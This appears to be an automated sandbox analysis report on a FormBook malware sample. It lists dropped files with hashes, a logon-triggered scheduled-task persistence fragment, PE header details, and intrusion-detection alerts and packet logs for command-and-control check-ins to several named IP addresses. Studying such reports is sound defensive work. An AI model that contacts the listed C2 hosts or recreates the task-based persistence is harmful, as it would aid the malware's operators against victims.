                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pt5uenm.wmn.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_215p4pri.lje.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sssayjb.urf.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4igpxqyx.0yv.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aroxc5bz.i4w.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcs31di0.vjc.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbahm1gg.me1.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwg3fl0d.pwi.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp175E.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1582
                                              Entropy (8bit):5.10757471506268
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTiv
                                              MD5:0B933E95D76D96AE6AF59101552D03B1
                                              SHA1:8FC2947CC4476B1332AB2219FF1E307B642AAB87
                                              SHA-256:DAF2077AB4E08EC99E003E0E4A3E36195036FC8278557581970DCEF5DEB8E8E5
                                              SHA-512:B9C15D068C3F925352052E53FDFD56635144B8DD24AED0DB43831497A47398F7C90840BB942960F1145F329EF19073A73899D66D5A5733C2640A3A021AEF4E9F
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                              C:\Users\user\AppData\Local\Temp\tmpE61C.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1582
                                              Entropy (8bit):5.10757471506268
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTiv
                                              MD5:0B933E95D76D96AE6AF59101552D03B1
                                              SHA1:8FC2947CC4476B1332AB2219FF1E307B642AAB87
                                              SHA-256:DAF2077AB4E08EC99E003E0E4A3E36195036FC8278557581970DCEF5DEB8E8E5
                                              SHA-512:B9C15D068C3F925352052E53FDFD56635144B8DD24AED0DB43831497A47398F7C90840BB942960F1145F329EF19073A73899D66D5A5733C2640A3A021AEF4E9F
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                              C:\Users\user\AppData\Roaming\zdDlscHlw.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):757248
                                              Entropy (8bit):7.772343266169615
                                              Encrypted:false
                                              SSDEEP:12288:2Jn6k+lXZJlSCg07Oq7gyRTjUidH+i/rdg7GZK5rO/Lztnm1my5usx+XtKJ:nkYXVS7Q7n/de9bd+zwxt
                                              MD5:3F10D9AE24F018B0CA90A3F5B4365C48
                                              SHA1:D19111D80986035ECD143BC04D0A46B600AA3E4B
                                              SHA-256:65990A23E7F833BE5F9A90B3A50DC246EC89FFDB4BCC1895C5FE4917438483CE
                                              SHA-512:E3C092BA40F73E87932F2454EE8EBF3CCC48ED16F6161243FDFFB5729A1D0D1000C839473EEA398CDE10036BE158CC8F51E2C70C23DB94886B8E4602B262A083
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0................. ........@.. ....................................@.....................................O...................................$...p............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........d...K......`....................................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.....*....0...........s......o.....*".(.....*.0...........s".....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0............o ....+..*.0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....

                                              C:\Users\user\AppData\Roaming\zdDlscHlw.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.772343266169615
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:C6Abn5cBei.exe
                                              File size:757'248 bytes
                                              MD5:3f10d9ae24f018b0ca90a3f5b4365c48
                                              SHA1:d19111d80986035ecd143bc04d0a46b600aa3e4b
                                              SHA256:65990a23e7f833be5f9a90b3a50dc246ec89ffdb4bcc1895c5fe4917438483ce
                                              SHA512:e3c092ba40f73e87932f2454ee8ebf3ccc48ed16f6161243fdffb5729a1d0d1000c839473eea398cde10036be158cc8f51e2c70c23db94886b8e4602b262a083
                                              SSDEEP:12288:2Jn6k+lXZJlSCg07Oq7gyRTjUidH+i/rdg7GZK5rO/Lztnm1my5usx+XtKJ:nkYXVS7Q7n/de9bd+zwxt
                                              TLSH:B0F401682756DA02CAA5A7751EB2F1B517BC2EDEFA00D2174FC93DDBB86AF000D44253
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4ba2d6
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xEE97DEC3 [Mon Nov 5 05:06:11 2096 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba2840x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x5a4.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb86240x70.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xb82dc0xb8400ea47909d76c04d330d07019cf1e4bedbFalse0.9201193075814111COM executable for DOS7.779278383035423IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xbc0000x5a40x60071d23add3f0e8e141901693385f8d711False0.4205729166666667data4.063134395683247IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xbe0000xc0x2006c9160da8022936183ca5140d27dc39aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0xbc0900x314data0.434010152284264
                                              RT_MANIFEST0xbc3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-11T05:21:51.967852+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849712172.67.145.23480TCP
                                              2025-01-11T05:22:08.786803+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971343.199.54.15880TCP
                                              2025-01-11T05:22:08.786803+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.84971343.199.54.15880TCP
                                              2025-01-11T05:22:11.567999+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971443.199.54.15880TCP
                                              2025-01-11T05:22:14.318121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972743.199.54.15880TCP
                                              2025-01-11T05:22:36.706516+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84974443.199.54.15880TCP
                                              2025-01-11T05:22:42.651153+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849906154.88.22.10780TCP
                                              2025-01-11T05:22:45.210232+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849924154.88.22.10780TCP
                                              2025-01-11T05:22:47.764735+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849937154.88.22.10780TCP
                                              2025-01-11T05:22:50.301222+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849955154.88.22.10780TCP
                                              2025-01-11T05:22:56.825316+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849988154.23.184.9580TCP
                                              2025-01-11T05:22:59.498294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849989154.23.184.9580TCP
                                              2025-01-11T05:23:02.595856+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849990154.23.184.9580TCP
                                              2025-01-11T05:23:05.129591+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849991154.23.184.9580TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 11, 2025 05:21:51.330084085 CET4971280192.168.2.8172.67.145.234
                                              Jan 11, 2025 05:21:51.335110903 CET8049712172.67.145.234192.168.2.8
                                              Jan 11, 2025 05:21:51.337444067 CET4971280192.168.2.8172.67.145.234
                                              Jan 11, 2025 05:21:51.385659933 CET4971280192.168.2.8172.67.145.234
                                              Jan 11, 2025 05:21:51.390639067 CET8049712172.67.145.234192.168.2.8
                                              Jan 11, 2025 05:21:51.966532946 CET8049712172.67.145.234192.168.2.8
                                              Jan 11, 2025 05:21:51.967778921 CET8049712172.67.145.234192.168.2.8
                                              Jan 11, 2025 05:21:51.967852116 CET4971280192.168.2.8172.67.145.234
                                              Jan 11, 2025 05:21:51.970061064 CET4971280192.168.2.8172.67.145.234
                                              Jan 11, 2025 05:21:51.974944115 CET8049712172.67.145.234192.168.2.8
                                              Jan 11, 2025 05:22:07.069613934 CET4971380192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:07.255702972 CET804971343.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:07.255808115 CET4971380192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:07.271908045 CET4971380192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:07.276786089 CET804971343.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:08.786803007 CET4971380192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:08.834791899 CET804971343.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:09.852278948 CET4971480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:09.857209921 CET804971443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:09.857276917 CET4971480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:10.060489893 CET4971480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:10.065301895 CET804971443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:11.567998886 CET4971480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:11.614691019 CET804971443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:12.736423016 CET4972780192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:12.741379023 CET804972743.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:12.741487980 CET4972780192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:12.801029921 CET4972780192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:12.805975914 CET804972743.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:12.806102991 CET804972743.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:14.318120956 CET4972780192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:14.370647907 CET804972743.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:15.337778091 CET4974480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:15.342556000 CET804974443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:15.342637062 CET4974480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:15.354065895 CET4974480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:15.360930920 CET804974443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:28.643976927 CET804971343.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:28.644027948 CET4971380192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:31.217855930 CET804971443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:31.217945099 CET4971480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:34.140115976 CET804972743.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:34.140297890 CET4972780192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:36.706317902 CET804974443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:36.706516027 CET4974480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:36.719064951 CET4974480192.168.2.843.199.54.158
                                              Jan 11, 2025 05:22:36.724024057 CET804974443.199.54.158192.168.2.8
                                              Jan 11, 2025 05:22:41.752494097 CET4990680192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:41.757419109 CET8049906154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:41.757555008 CET4990680192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:41.773291111 CET4990680192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:41.778177977 CET8049906154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:42.651037931 CET8049906154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:42.651096106 CET8049906154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:42.651153088 CET4990680192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:43.292249918 CET4990680192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:44.306081057 CET4992480192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:44.310962915 CET8049924154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:44.311029911 CET4992480192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:44.326875925 CET4992480192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:44.331798077 CET8049924154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:45.209973097 CET8049924154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:45.210058928 CET8049924154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:45.210232019 CET4992480192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:45.833653927 CET4992480192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:46.851949930 CET4993780192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:46.856834888 CET8049937154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:46.860424995 CET4993780192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:46.874960899 CET4993780192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:46.879859924 CET8049937154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:46.879966021 CET8049937154.88.22.107192.168.2.8
